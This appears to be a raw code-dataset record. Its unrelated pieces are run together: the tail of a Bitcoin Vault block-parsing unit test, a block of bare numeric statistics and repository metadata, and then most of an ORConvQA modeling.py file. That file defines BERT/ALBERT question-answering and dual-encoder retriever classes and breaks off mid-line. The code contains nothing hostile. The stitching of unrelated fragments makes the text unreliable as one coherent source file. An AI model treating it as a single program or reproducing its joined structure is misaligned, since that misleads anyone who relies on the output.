VaultTxType.RECOVERY) def test_discover_ar_alert_alerts_disabled(self): raw_block = bytes.fromhex( HEADER + '01' + AR_ALERT_SEGWIT + '01' + AR_ALERT_SEGWIT ) _coin = BitcoinVault() block = _coin.block(raw_block, 344) transactions = block.transactions alerts = block.alerts self.assertEqual(len(transactions), 1) self.assertIsInstance(transactions[0][0], TxVaultSegWit) self.assertEqual(transactions[0][0].type, VaultTxType.NONVAULT) self.assertEqual(len(alerts), 0)
66.828947
1,003
0.824719
1,043
20,316
15.878236
0.072867
0.043476
0.033694
0.02053
0.313991
0.3091
0.305537
0.305537
0.301008
0.291226
0
0.45411
0.126354
20,316
303
1,004
67.049505
0.478957
0
0
0.711934
0
0
0.535046
0.532191
0
1
0
0
0.271605
1
0.082305
false
0
0.012346
0
0.106996
0
0
0
1
null
0
0
0
0
0
0
0
0
0
0
1
0
0
0
1
0
1
0
0
1
0
0
0
1
null
1
0
0
0
0
0
0
0
0
0
0
0
0
7
f1da58a9d853f20c13cf4aabd1ce9d9f9033cf4b
57,573
py
Python
modeling.py
somiltg/orconvqa-release
61dac37ee018a55bebef5bda9c3588937e010254
[ "MIT" ]
null
null
null
modeling.py
somiltg/orconvqa-release
61dac37ee018a55bebef5bda9c3588937e010254
[ "MIT" ]
null
null
null
modeling.py
somiltg/orconvqa-release
61dac37ee018a55bebef5bda9c3588937e010254
[ "MIT" ]
1
2021-04-02T07:06:10.000Z
2021-04-02T07:06:10.000Z
import os import logging import collections import torch from transformers import BertModel, BertPreTrainedModel, AlbertModel from transformers.modeling_bert import (BertEncoder, BertOutput, BertAttention, BertIntermediate, BertLayer, BertEmbeddings, BertPooler, BertLayerNorm) from transformers.modeling_albert import AlbertPreTrainedModel from torch import nn from torch.nn import CrossEntropyLoss import torch.nn.functional as F from copy import deepcopy from transformers.configuration_utils import PretrainedConfig from transformers.file_utils import (TF2_WEIGHTS_NAME, TF_WEIGHTS_NAME, WEIGHTS_NAME, cached_path) logger = logging.getLogger(__name__) class BertForOrconvqa(BertPreTrainedModel): r""" **start_positions**: (`optional`) ``torch.LongTensor`` of shape ``(batch_size,)``: Labels for position (index) of the start of the labelled span for computing the token classification loss. Positions are clamped to the length of the sequence (`sequence_length`). Position outside of the sequence are not taken into account for computing the loss. **end_positions**: (`optional`) ``torch.LongTensor`` of shape ``(batch_size,)``: Labels for position (index) of the end of the labelled span for computing the token classification loss. Positions are clamped to the length of the sequence (`sequence_length`). Position outside of the sequence are not taken into account for computing the loss. **retrieval_label**: (`optional`) ``torch.LongTensor`` of shape ``(batch_size,)``: Whether the retrieved evidence is the true evidence. For computing the sentece classification loss. Outputs: `Tuple` comprising various elements depending on the configuration (config) and inputs: **loss**: (`optional`, returned when ``labels`` is provided) ``torch.FloatTensor`` of shape ``(1,)``: Total span extraction loss is the sum of a Cross-Entropy for the start and end positions. **start_scores**: ``torch.FloatTensor`` of shape ``(batch_size, sequence_length,)`` Span-start scores (before SoftMax). **end_scores**: ``torch.FloatTensor`` of shape ``(batch_size, sequence_length,)`` Span-end scores (before SoftMax). **hidden_states**: (`optional`, returned when ``config.output_hidden_states=True``) list of ``torch.FloatTensor`` (one for the output of each layer + the output of the embeddings) of shape ``(batch_size, sequence_length, hidden_size)``: Hidden-states of the model at the output of each layer plus the initial embedding outputs. **attentions**: (`optional`, returned when ``config.output_attentions=True``) list of ``torch.FloatTensor`` (one for each layer) of shape ``(batch_size, num_heads, sequence_length, sequence_length)``: Attentions weights after the attention softmax, used to compute the weighted average in the self-attention heads. """ def __init__(self, config): super(BertForOrconvqa, self).__init__(config) self.num_qa_labels = config.num_qa_labels self.num_retrieval_labels = config.num_retrieval_labels self.bert = BertModel(config) self.qa_outputs = nn.Linear(config.hidden_size, config.num_qa_labels) self.dropout = nn.Dropout(config.hidden_dropout_prob) self.classifier = nn.Linear(config.hidden_size, config.num_retrieval_labels) self.qa_loss_factor = config.qa_loss_factor self.retrieval_loss_factor = config.retrieval_loss_factor self.init_weights() def forward(self, input_ids=None, attention_mask=None, token_type_ids=None, position_ids=None, head_mask=None, inputs_embeds=None, start_positions=None, end_positions=None, retrieval_label=None): outputs = self.bert(input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, position_ids=position_ids, head_mask=head_mask, inputs_embeds=inputs_embeds) sequence_output = outputs[0] pooled_output = outputs[1] qa_logits = self.qa_outputs(sequence_output) start_logits, end_logits = qa_logits.split(1, dim=-1) start_logits = start_logits.squeeze(-1) end_logits = end_logits.squeeze(-1) pooled_output = self.dropout(pooled_output) retrieval_logits = self.classifier(pooled_output) outputs = (start_logits, end_logits, retrieval_logits) + outputs[2:] if start_positions is not None and end_positions is not None and retrieval_label is not None: # If we are on multi-GPU, split add a dimension if len(start_positions.size()) > 1: start_positions = start_positions.squeeze(-1) if len(end_positions.size()) > 1: end_positions = end_positions.squeeze(-1) # sometimes the start/end positions are outside our model inputs, we ignore these terms ignored_index = start_logits.size(1) start_positions.clamp_(0, ignored_index) end_positions.clamp_(0, ignored_index) qa_loss_fct = CrossEntropyLoss(ignore_index=ignored_index) start_loss = qa_loss_fct(start_logits, start_positions) end_loss = qa_loss_fct(end_logits, end_positions) qa_loss = (start_loss + end_loss) / 2 retrieval_loss_fct = CrossEntropyLoss() retrieval_loss = retrieval_loss_fct(retrieval_logits.view(-1, self.num_retrieval_labels), retrieval_label.view(-1)) total_loss = self.qa_loss_factor * qa_loss + self.retrieval_loss_factor * retrieval_loss outputs = (total_loss, qa_loss, retrieval_loss,) + outputs return outputs # (loss), start_logits, end_logits, (hidden_states), (attentions) class BertForOrconvqaGlobal(BertPreTrainedModel): r""" **start_positions**: (`optional`) ``torch.LongTensor`` of shape ``(batch_size, num_blocks,)``: Labels for position (index) of the start of the labelled span for computing the token classification loss. Positions are clamped to the length of the sequence (`sequence_length`). Position outside of the sequence are not taken into account for computing the loss. **end_positions**: (`optional`) ``torch.LongTensor`` of shape ``(batch_size, num_blocks,)``: Labels for position (index) of the end of the labelled span for computing the token classification loss. Positions are clamped to the length of the sequence (`sequence_length`). Position outside of the sequence are not taken into account for computing the loss. **retrieval_label**: (`optional`) ``torch.LongTensor`` of shape ``(batch_size, num_blocks,)``: Whether the retrieved evidence is the true evidence. For computing the sentece classification loss. Outputs: `Tuple` comprising various elements depending on the configuration (config) and inputs: **loss**: (`optional`, returned when ``labels`` is provided) ``torch.FloatTensor`` of shape ``(1,)``: Total span extraction loss is the sum of a Cross-Entropy for the start and end positions. **start_scores**: ``torch.FloatTensor`` of shape ``(batch_size, sequence_length,)`` Span-start scores (before SoftMax). **end_scores**: ``torch.FloatTensor`` of shape ``(batch_size, sequence_length,)`` Span-end scores (before SoftMax). **hidden_states**: (`optional`, returned when ``config.output_hidden_states=True``) list of ``torch.FloatTensor`` (one for the output of each layer + the output of the embeddings) of shape ``(batch_size, sequence_length, hidden_size)``: Hidden-states of the model at the output of each layer plus the initial embedding outputs. **attentions**: (`optional`, returned when ``config.output_attentions=True``) list of ``torch.FloatTensor`` (one for each layer) of shape ``(batch_size, num_heads, sequence_length, sequence_length)``: Attentions weights after the attention softmax, used to compute the weighted average in the self-attention heads. """ def __init__(self, config): super(BertForOrconvqaGlobal, self).__init__(config) self.num_qa_labels = config.num_qa_labels self.bert = BertModel(config) self.qa_outputs = nn.Linear(config.hidden_size, config.num_qa_labels) self.dropout = nn.Dropout(config.hidden_dropout_prob) self.classifier = nn.Linear(config.hidden_size, 1) self.qa_loss_factor = config.qa_loss_factor self.retrieval_loss_factor = config.retrieval_loss_factor self.init_weights() def forward(self, input_ids=None, attention_mask=None, token_type_ids=None, position_ids=None, head_mask=None, inputs_embeds=None, start_positions=None, end_positions=None, retrieval_label=None): batch_size, num_blocks, seq_len = input_ids.size() input_ids = input_ids.view(-1, seq_len) attention_mask = attention_mask.view(-1, seq_len) token_type_ids = token_type_ids.view(-1, seq_len) outputs = self.bert(input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, position_ids=position_ids, head_mask=head_mask, inputs_embeds=inputs_embeds) sequence_output = outputs[0] pooled_output = outputs[1] qa_logits = self.qa_outputs(sequence_output) start_logits, end_logits = qa_logits.split(1, dim=-1) start_logits = start_logits.squeeze(-1) # (batch_size * num_blocks, seq_len) # print('start_logits', start_logits.size()) end_logits = end_logits.squeeze(-1) pooled_output = self.dropout(pooled_output) retrieval_logits = self.classifier(pooled_output) # (batch_size * num_blocks, 1) # print('retrieval_logits', retrieval_logits.size()) outputs = (start_logits, end_logits, retrieval_logits) + outputs[2:] if start_positions is not None and end_positions is not None and retrieval_label is not None: start_logits = start_logits.view(batch_size, -1) end_logits = end_logits.view(batch_size, -1) retrival_logits = retrieval_logits.squeeze(-1) retrieval_logits = retrieval_logits.view(batch_size, -1) start_positions = start_positions.squeeze(-1).max(dim=1).values end_positions = end_positions.squeeze(-1).max(dim=1).values retrieval_label = retrieval_label.squeeze(-1).argmax(dim=1) # If we are on multi-GPU, split add a dimension if len(start_positions.size()) > 1: start_positions = start_positions.squeeze(-1) if len(end_positions.size()) > 1: end_positions = end_positions.squeeze(-1) # sometimes the start/end positions are outside our model inputs, we ignore these terms ignored_index = start_logits.size(1) start_positions.clamp_(0, ignored_index) end_positions.clamp_(0, ignored_index) qa_loss_fct = CrossEntropyLoss(ignore_index=ignored_index) start_loss = qa_loss_fct(start_logits, start_positions) end_loss = qa_loss_fct(end_logits, end_positions) qa_loss = (start_loss + end_loss) / 2 retrieval_loss_fct = CrossEntropyLoss() retrieval_loss = retrieval_loss_fct(retrieval_logits, retrieval_label) total_loss = self.qa_loss_factor * qa_loss + self.retrieval_loss_factor * retrieval_loss outputs = (total_loss, qa_loss, retrieval_loss,) + outputs return outputs # (loss), start_logits, end_logits, (hidden_states), (attentions) class AlbertForOrconvqaGlobal(AlbertPreTrainedModel): r""" **start_positions**: (`optional`) ``torch.LongTensor`` of shape ``(batch_size, num_blocks,)``: Labels for position (index) of the start of the labelled span for computing the token classification loss. Positions are clamped to the length of the sequence (`sequence_length`). Position outside of the sequence are not taken into account for computing the loss. **end_positions**: (`optional`) ``torch.LongTensor`` of shape ``(batch_size, num_blocks,)``: Labels for position (index) of the end of the labelled span for computing the token classification loss. Positions are clamped to the length of the sequence (`sequence_length`). Position outside of the sequence are not taken into account for computing the loss. **retrieval_label**: (`optional`) ``torch.LongTensor`` of shape ``(batch_size, num_blocks,)``: Whether the retrieved evidence is the true evidence. For computing the sentece classification loss. Outputs: `Tuple` comprising various elements depending on the configuration (config) and inputs: **loss**: (`optional`, returned when ``labels`` is provided) ``torch.FloatTensor`` of shape ``(1,)``: Total span extraction loss is the sum of a Cross-Entropy for the start and end positions. **start_scores**: ``torch.FloatTensor`` of shape ``(batch_size, sequence_length,)`` Span-start scores (before SoftMax). **end_scores**: ``torch.FloatTensor`` of shape ``(batch_size, sequence_length,)`` Span-end scores (before SoftMax). **hidden_states**: (`optional`, returned when ``config.output_hidden_states=True``) list of ``torch.FloatTensor`` (one for the output of each layer + the output of the embeddings) of shape ``(batch_size, sequence_length, hidden_size)``: Hidden-states of the model at the output of each layer plus the initial embedding outputs. **attentions**: (`optional`, returned when ``config.output_attentions=True``) list of ``torch.FloatTensor`` (one for each layer) of shape ``(batch_size, num_heads, sequence_length, sequence_length)``: Attentions weights after the attention softmax, used to compute the weighted average in the self-attention heads. """ def __init__(self, config): super(AlbertForOrconvqaGlobal, self).__init__(config) self.num_qa_labels = config.num_qa_labels self.albert = AlbertModel(config) self.qa_outputs = nn.Linear(config.hidden_size, config.num_qa_labels) self.dropout = nn.Dropout(config.hidden_dropout_prob) self.classifier = nn.Linear(config.hidden_size, 1) self.qa_loss_factor = config.qa_loss_factor self.retrieval_loss_factor = config.retrieval_loss_factor self.init_weights() def forward(self, input_ids=None, attention_mask=None, token_type_ids=None, position_ids=None, head_mask=None, inputs_embeds=None, start_positions=None, end_positions=None, retrieval_label=None): batch_size, num_blocks, seq_len = input_ids.size() input_ids = input_ids.view(-1, seq_len) attention_mask = attention_mask.view(-1, seq_len) token_type_ids = token_type_ids.view(-1, seq_len) outputs = self.albert(input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, position_ids=position_ids, head_mask=head_mask, inputs_embeds=inputs_embeds) sequence_output = outputs[0] pooled_output = outputs[1] qa_logits = self.qa_outputs(sequence_output) start_logits, end_logits = qa_logits.split(1, dim=-1) start_logits = start_logits.squeeze(-1) # (batch_size * num_blocks, seq_len) # print('start_logits', start_logits.size()) end_logits = end_logits.squeeze(-1) pooled_output = self.dropout(pooled_output) retrieval_logits = self.classifier(pooled_output) # (batch_size * num_blocks, 1) # print('retrieval_logits', retrieval_logits.size()) outputs = (start_logits, end_logits, retrieval_logits) + outputs[2:] if start_positions is not None and end_positions is not None and retrieval_label is not None: start_logits = start_logits.view(batch_size, -1) end_logits = end_logits.view(batch_size, -1) retrival_logits = retrieval_logits.squeeze(-1) retrieval_logits = retrieval_logits.view(batch_size, -1) start_positions = start_positions.squeeze(-1).max(dim=1).values end_positions = end_positions.squeeze(-1).max(dim=1).values retrieval_label = retrieval_label.squeeze(-1).argmax(dim=1) # If we are on multi-GPU, split add a dimension if len(start_positions.size()) > 1: start_positions = start_positions.squeeze(-1) if len(end_positions.size()) > 1: end_positions = end_positions.squeeze(-1) # sometimes the start/end positions are outside our model inputs, we ignore these terms ignored_index = start_logits.size(1) start_positions.clamp_(0, ignored_index) end_positions.clamp_(0, ignored_index) qa_loss_fct = CrossEntropyLoss(ignore_index=ignored_index) start_loss = qa_loss_fct(start_logits, start_positions) end_loss = qa_loss_fct(end_logits, end_positions) qa_loss = (start_loss + end_loss) / 2 retrieval_loss_fct = CrossEntropyLoss() retrieval_loss = retrieval_loss_fct(retrieval_logits, retrieval_label) total_loss = self.qa_loss_factor * qa_loss + self.retrieval_loss_factor * retrieval_loss outputs = (total_loss, qa_loss, retrieval_loss,) + outputs return outputs # (loss), start_logits, end_logits, (hidden_states), (attentions) class BertForRetriever(BertPreTrainedModel): r""" """ def __init__(self, config): super(BertForRetriever, self).__init__(config) self.query_encoder = BertModel(config) self.query_proj = nn.Linear(config.hidden_size, config.proj_size) self.passage_encoder = BertModel(config) self.passage_proj = nn.Linear(config.hidden_size, config.proj_size) self.proj_size = config.proj_size self.dropout = nn.Dropout(config.hidden_dropout_prob) self.init_weights() def forward(self, query_input_ids=None, query_attention_mask=None, query_token_type_ids=None, passage_input_ids=None, passage_attention_mask=None, passage_token_type_ids=None, retrieval_label=None): outputs = () if query_input_ids is not None: query_outputs = self.query_encoder(query_input_ids, attention_mask=query_attention_mask, token_type_ids=query_token_type_ids) query_pooled_output = query_outputs[1] query_pooled_output = self.dropout(query_pooled_output) query_rep = self.query_proj(query_pooled_output) # batch_size, proj_size # print(query_rep[:, 0]) outputs = (query_rep, ) + outputs if passage_input_ids is not None: if len(passage_input_ids.size()) == 3: # this means we are pretraining batch_size, num_blocks, seq_len = passage_input_ids.size() passage_input_ids = passage_input_ids.view(-1, seq_len) # batch_size * num_blocks, seq_len passage_attention_mask = passage_attention_mask.view(-1, seq_len) passage_token_type_ids = passage_token_type_ids.view(-1, seq_len) passage_outputs = self.passage_encoder(passage_input_ids, attention_mask=passage_attention_mask, token_type_ids=passage_token_type_ids) passage_pooled_output = passage_outputs[1] passage_pooled_output = self.dropout(passage_pooled_output) passage_rep = self.passage_proj(passage_pooled_output) # batch_size * num_blocks, proj_size # print(passage_rep[:, 0]) outputs = (passage_rep, ) + outputs if query_input_ids is not None and passage_input_ids is not None and retrieval_label is not None: passage_rep = passage_rep.view(batch_size, num_blocks, -1) # batch_size, num_blocks, proj_size query_rep = query_rep.unsqueeze(-1) # query_rep (batch_size, proj_size, 1) query_rep = query_rep.expand(batch_size, self.proj_size, num_blocks) # batch_size, proj_size, num_blocks) query_rep = query_rep.transpose(1, 2) # query_rep (batch_size, num_blocks, proj_size) retrieval_logits = query_rep * passage_rep # batch_size, num_blocks, proj_size retrieval_logits = torch.sum(retrieval_logits, dim=-1) # batch_size, num_blocks retrieval_probs = F.softmax(retrieval_logits, dim=1) # print('retrieval_label before', retrieval_label.size(), retrieval_label) retrieval_label = retrieval_label.squeeze(-1).argmax(dim=1) # print('retrieval_label after', retrieval_label.size(), retrieval_label) retrieval_loss_fct = CrossEntropyLoss() # print('retrieval_logits', retrieval_logits.size(), retrieval_logits) # print('retrieval_label', retrieval_label.size(), retrieval_label) retrieval_loss = retrieval_loss_fct(retrieval_logits, retrieval_label) retrieval_logits = retrieval_logits.view(-1) outputs = (retrieval_loss, retrieval_logits, retrieval_probs) + outputs return outputs @classmethod def from_pretrained(cls, pretrained_model_name_or_path, *model_args, **kwargs): r""" """ if pretrained_model_name_or_path is not None and ( "albert" in pretrained_model_name_or_path and "v2" in pretrained_model_name_or_path): logger.warning("There is currently an upstream reproducibility issue with ALBERT v2 models. Please see " + "https://github.com/google-research/google-research/issues/119 for more information.") config = kwargs.pop('config', None) state_dict = kwargs.pop('state_dict', None) cache_dir = kwargs.pop('cache_dir', None) from_tf = kwargs.pop('from_tf', False) force_download = kwargs.pop('force_download', False) resume_download = kwargs.pop('resume_download', False) proxies = kwargs.pop('proxies', None) output_loading_info = kwargs.pop('output_loading_info', False) # Load config if config is None: config, model_kwargs = cls.config_class.from_pretrained( pretrained_model_name_or_path, *model_args, cache_dir=cache_dir, return_unused_kwargs=True, force_download=force_download, proxies=proxies, **kwargs ) else: model_kwargs = kwargs # Load model if pretrained_model_name_or_path is not None: if pretrained_model_name_or_path in cls.pretrained_model_archive_map: archive_file = cls.pretrained_model_archive_map[pretrained_model_name_or_path] elif os.path.isdir(pretrained_model_name_or_path): if from_tf and os.path.isfile(os.path.join(pretrained_model_name_or_path, TF_WEIGHTS_NAME + ".index")): # Load from a TF 1.0 checkpoint archive_file = os.path.join(pretrained_model_name_or_path, TF_WEIGHTS_NAME + ".index") elif from_tf and os.path.isfile(os.path.join(pretrained_model_name_or_path, TF2_WEIGHTS_NAME)): # Load from a TF 2.0 checkpoint archive_file = os.path.join(pretrained_model_name_or_path, TF2_WEIGHTS_NAME) elif os.path.isfile(os.path.join(pretrained_model_name_or_path, WEIGHTS_NAME)): # Load from a PyTorch checkpoint archive_file = os.path.join(pretrained_model_name_or_path, WEIGHTS_NAME) else: raise EnvironmentError("Error no file named {} found in directory {} or `from_tf` set to False".format( [WEIGHTS_NAME, TF2_WEIGHTS_NAME, TF_WEIGHTS_NAME + ".index"], pretrained_model_name_or_path)) elif os.path.isfile(pretrained_model_name_or_path + ".index"): assert from_tf, "We found a TensorFlow checkpoint at {}, please set from_tf to True to load from this checkpoint".format( pretrained_model_name_or_path + ".index") archive_file = pretrained_model_name_or_path + ".index" # redirect to the cache, if necessary try: resolved_archive_file = cached_path(archive_file, cache_dir=cache_dir, force_download=force_download, proxies=proxies) except EnvironmentError: if pretrained_model_name_or_path in cls.pretrained_model_archive_map: msg = "Couldn't reach server at '{}' to download pretrained weights.".format( archive_file) else: msg = "Model name '{}' was not found in model name list ({}). " \ "We assumed '{}' was a path or url to model weight files named one of {} but " \ "couldn't find any such file at this path or url.".format( pretrained_model_name_or_path, ', '.join(cls.pretrained_model_archive_map.keys()), archive_file, [WEIGHTS_NAME, TF2_WEIGHTS_NAME, TF_WEIGHTS_NAME]) raise EnvironmentError(msg) if resolved_archive_file == archive_file: logger.info("loading weights file {}".format(archive_file)) else: logger.info("loading weights file {} from cache at {}".format( archive_file, resolved_archive_file)) else: resolved_archive_file = None # Instantiate model. model = cls(config, *model_args, **model_kwargs) if state_dict is None and not from_tf: state_dict = torch.load(resolved_archive_file, map_location='cpu') missing_keys = [] unexpected_keys = [] error_msgs = [] if from_tf: if resolved_archive_file.endswith('.index'): # Load from a TensorFlow 1.X checkpoint - provided by original authors model = cls.load_tf_weights(model, config, resolved_archive_file[:-6]) # Remove the '.index' else: # Load from our TensorFlow 2.0 checkpoints try: from transformers import load_tf2_checkpoint_in_pytorch_model model = load_tf2_checkpoint_in_pytorch_model(model, resolved_archive_file, allow_missing_keys=True) except ImportError as e: logger.error("Loading a TensorFlow model in PyTorch, requires both PyTorch and TensorFlow to be installed. Please see " "https://pytorch.org/ and https://www.tensorflow.org/install/ for installation instructions.") raise e else: # Convert old format to new format if needed from a PyTorch state_dict old_keys = [] new_keys = [] for key in state_dict.keys(): new_key = None if 'gamma' in key: new_key = key.replace('gamma', 'weight') if 'beta' in key: new_key = key.replace('beta', 'bias') if key == 'lm_head.decoder.weight': new_key = 'lm_head.weight' if new_key: old_keys.append(key) new_keys.append(new_key) for old_key, new_key in zip(old_keys, new_keys): state_dict[new_key] = state_dict.pop(old_key) # copy state_dict so _load_from_state_dict can modify it metadata = getattr(state_dict, '_metadata', None) # print('orig state dict', state_dict.keys(), len(state_dict)) customized_state_dict = collections.OrderedDict() for k, v in state_dict.items(): k_split = k.split('.') if k_split[0] == 'bert': k_split[0] = 'query_encoder' customized_state_dict['.'.join(k_split)] = v k_split[0] = 'passage_encoder' customized_state_dict['.'.join(k_split)] = v if len(customized_state_dict) == 0: # loading from our trained model state_dict = state_dict.copy() # print('using orig state dict', state_dict.keys()) else: # loading from original bert model state_dict = customized_state_dict.copy() # print('using custome state dict', state_dict.keys()) # print('modified state dict', state_dict.keys(), len(state_dict)) if metadata is not None: state_dict._metadata = metadata # PyTorch's `_load_from_state_dict` does not copy parameters in a module's descendants # so we need to apply the function recursively. def load(module, prefix=''): local_metadata = {} if metadata is None else metadata.get(prefix[:-1], {}) module._load_from_state_dict( state_dict, prefix, local_metadata, True, missing_keys, unexpected_keys, error_msgs) for name, child in module._modules.items(): if name == 'query_encoder.embeddings.token_type_embeddings.weight': print("name child {}".format(child)) if child is not None: load(child, prefix + name + '.') # Make sure we are able to load base models as well as derived models (with heads) start_prefix = '' model_to_load = model # if not hasattr(model, cls.base_model_prefix) and any(s.startswith(cls.base_model_prefix) for s in state_dict.keys()): # start_prefix = cls.base_model_prefix + '.' # if hasattr(model, cls.base_model_prefix) and not any(s.startswith(cls.base_model_prefix) for s in state_dict.keys()): # model_to_load = getattr(model, cls.base_model_prefix) # load(model_to_load, prefix=start_prefix) load(model_to_load, prefix='') if len(missing_keys) > 0: logger.info("Weights of {} not initialized from pretrained model: {}".format( model.__class__.__name__, missing_keys)) if len(unexpected_keys) > 0: logger.info("Weights from pretrained model not used in {}: {}".format( model.__class__.__name__, unexpected_keys)) if len(error_msgs) > 0: raise RuntimeError('Error(s) in loading state_dict for {}:\n\t{}'.format( model.__class__.__name__, "\n\t".join(error_msgs))) model.tie_weights() # make sure word embedding weights are still tied if needed # Set model in evaluation mode to desactivate DropOut modules by default model.eval() if output_loading_info: loading_info = {"missing_keys": missing_keys, "unexpected_keys": unexpected_keys, "error_msgs": error_msgs} return model, loading_info return model class BertForRetrieverOnlyPositivePassage(BertForRetriever): r""" """ def __init__(self, config): super(BertForRetriever, self).__init__(config) self.query_encoder = BertModel(config) self.query_proj = nn.Linear(config.hidden_size, config.proj_size) self.passage_encoder = BertModel(config) self.passage_proj = nn.Linear(config.hidden_size, config.proj_size) self.proj_size = config.proj_size self.dropout = nn.Dropout(config.hidden_dropout_prob) self.init_weights() def forward(self, query_input_ids=None, query_attention_mask=None, query_token_type_ids=None, passage_input_ids=None, passage_attention_mask=None, passage_token_type_ids=None, retrieval_label=None): outputs = () if query_input_ids is not None: query_outputs = self.query_encoder(query_input_ids, attention_mask=query_attention_mask, token_type_ids=query_token_type_ids) query_pooled_output = query_outputs[1] query_pooled_output = self.dropout(query_pooled_output) query_rep = self.query_proj(query_pooled_output) # batch_size, proj_size # print(query_rep[:, 0]) outputs = (query_rep, ) + outputs if passage_input_ids is not None: passage_outputs = self.passage_encoder(passage_input_ids, attention_mask=passage_attention_mask, token_type_ids=passage_token_type_ids) passage_pooled_output = passage_outputs[1] passage_pooled_output = self.dropout(passage_pooled_output) passage_rep = self.passage_proj(passage_pooled_output) # batch_size, proj_size # print(passage_rep[:, 0]) outputs = (passage_rep, ) + outputs if query_input_ids is not None and passage_input_ids is not None: passage_rep_t = passage_rep.transpose(0, 1) # proj_size, batch_size retrieval_logits = torch.matmul(query_rep, passage_rep_t) # batch_size, batch_size retrieval_label = torch.arange(query_rep.size(0), device=query_rep.device, dtype=retrieval_label.dtype) # print('retrieval_label after', retrieval_label.size(), retrieval_label) retrieval_loss_fct = CrossEntropyLoss() # print('retrieval_logits', retrieval_logits.size(), retrieval_logits) # print('retrieval_label', retrieval_label.size(), retrieval_label) retrieval_loss = retrieval_loss_fct(retrieval_logits, retrieval_label) outputs = (retrieval_loss, ) + outputs return outputs class AlbertForRetrieverOnlyPositivePassage(AlbertPreTrainedModel): r""" """ def __init__(self, config): super(AlbertForRetrieverOnlyPositivePassage, self).__init__(config) self.query_encoder = AlbertModel(config) self.query_proj = nn.Linear(config.hidden_size, config.proj_size) self.passage_encoder = AlbertModel(config) self.passage_proj = nn.Linear(config.hidden_size, config.proj_size) self.proj_size = config.proj_size self.dropout = nn.Dropout(config.hidden_dropout_prob) self.init_weights() def forward(self, query_input_ids=None, query_attention_mask=None, query_token_type_ids=None, passage_input_ids=None, passage_attention_mask=None, passage_token_type_ids=None, retrieval_label=None, query_rep=None, passage_rep=None, use_fine_grained_attention=False, use_soft_attention_weights=False, device=None): outputs = () if query_input_ids is not None: query_outputs = self.query_encoder(query_input_ids, attention_mask=query_attention_mask, token_type_ids=query_token_type_ids) query_pooled_output = query_outputs[1] query_pooled_output = self.dropout(query_pooled_output) query_rep = self.query_proj(query_pooled_output) # batch_size, proj_size # print(query_rep[:, 0]) outputs = (query_rep, ) + outputs if passage_input_ids is not None: passage_outputs = self.passage_encoder(passage_input_ids, attention_mask=passage_attention_mask, token_type_ids=passage_token_type_ids) passage_pooled_output = passage_outputs[1] passage_pooled_output = self.dropout(passage_pooled_output) passage_rep = self.passage_proj(passage_pooled_output) # batch_size, proj_size # print(passage_rep[:, 0]) outputs = (passage_rep, ) + outputs if query_input_ids is not None and passage_input_ids is not None: passage_rep_t = passage_rep.transpose(0, 1) # proj_size, batch_size retrieval_logits = torch.matmul(query_rep, passage_rep_t) # batch_size, batch_size retrieval_label = torch.arange(query_rep.size(0), device=query_rep.device, dtype=retrieval_label.dtype) # print('retrieval_label after', retrieval_label.size(), retrieval_label) retrieval_loss_fct = CrossEntropyLoss() # print('retrieval_logits', retrieval_logits.size(), retrieval_logits) # print('retrieval_label', retrieval_label.size(), retrieval_label) retrieval_loss = retrieval_loss_fct(retrieval_logits, retrieval_label) outputs = (retrieval_loss, ) + outputs if query_input_ids is not None and passage_rep is not None and retrieval_label is not None and len(passage_rep.size()) == 3: # this is during fine tuning # passage_rep: batch_size, num_blocks, proj_size query_outputs = self.query_encoder(query_input_ids, attention_mask=query_attention_mask, token_type_ids=query_token_type_ids) query_pooled_output = query_outputs[1] query_pooled_output = self.dropout(query_pooled_output) query_rep = self.query_proj(query_pooled_output) # batch_size, proj_size batch_size, num_blocks, proj_size = passage_rep.size() query_rep = query_rep.unsqueeze(-1) # query_rep (batch_size, proj_size, 1) query_rep = query_rep.expand(batch_size, self.proj_size, num_blocks) # batch_size, proj_size, num_blocks) query_rep = query_rep.transpose(1, 2) # query_rep (batch_size, num_blocks, proj_size) retrieval_logits = query_rep * passage_rep # batch_size, num_blocks, proj_size retrieval_logits = torch.sum(retrieval_logits, dim=-1) # batch_size, num_blocks retrieval_probs = F.softmax(retrieval_logits, dim=1) # print('retrieval_label before', retrieval_label.size(), retrieval_label) retrieval_label = retrieval_label.squeeze(-1).argmax(dim=1) # print('retrieval_label after', retrieval_label.size(), retrieval_label) retrieval_loss_fct = CrossEntropyLoss() # print('retrieval_logits', retrieval_logits.size(), retrieval_logits) # print('retrieval_label', retrieval_label.size(), retrieval_label) retrieval_loss = retrieval_loss_fct(retrieval_logits, retrieval_label) outputs = (retrieval_loss, ) + outputs return outputs @classmethod def from_pretrained(cls, pretrained_model_name_or_path, *model_args, **kwargs): r""" """ if pretrained_model_name_or_path is not None and ( "albert" in pretrained_model_name_or_path and "v2" in pretrained_model_name_or_path): logger.warning("There is currently an upstream reproducibility issue with ALBERT v2 models. Please see " + "https://github.com/google-research/google-research/issues/119 for more information.") config = kwargs.pop('config', None) state_dict = kwargs.pop('state_dict', None) cache_dir = kwargs.pop('cache_dir', None) from_tf = kwargs.pop('from_tf', False) force_download = kwargs.pop('force_download', False) resume_download = kwargs.pop('resume_download', False) proxies = kwargs.pop('proxies', None) output_loading_info = kwargs.pop('output_loading_info', False) use_pos_embedding = kwargs.pop('use_positional_segment_embedding', False) max_history_turns = config.type_vocab_size if config is not None else 2 print("use pos embedding {} max history turns {}".format(use_pos_embedding, max_history_turns)) # Load config if config is None: config, model_kwargs = cls.config_class.from_pretrained( pretrained_model_name_or_path, *model_args, cache_dir=cache_dir, return_unused_kwargs=True, force_download=force_download, proxies=proxies, **kwargs ) else: model_kwargs = kwargs # Load model if pretrained_model_name_or_path is not None: if pretrained_model_name_or_path in cls.pretrained_model_archive_map: archive_file = cls.pretrained_model_archive_map[pretrained_model_name_or_path] elif os.path.isdir(pretrained_model_name_or_path): if from_tf and os.path.isfile(os.path.join(pretrained_model_name_or_path, TF_WEIGHTS_NAME + ".index")): # Load from a TF 1.0 checkpoint archive_file = os.path.join(pretrained_model_name_or_path, TF_WEIGHTS_NAME + ".index") elif from_tf and os.path.isfile(os.path.join(pretrained_model_name_or_path, TF2_WEIGHTS_NAME)): # Load from a TF 2.0 checkpoint archive_file = os.path.join(pretrained_model_name_or_path, TF2_WEIGHTS_NAME) elif os.path.isfile(os.path.join(pretrained_model_name_or_path, WEIGHTS_NAME)): # Load from a PyTorch checkpoint archive_file = os.path.join(pretrained_model_name_or_path, WEIGHTS_NAME) else: raise EnvironmentError("Error no file 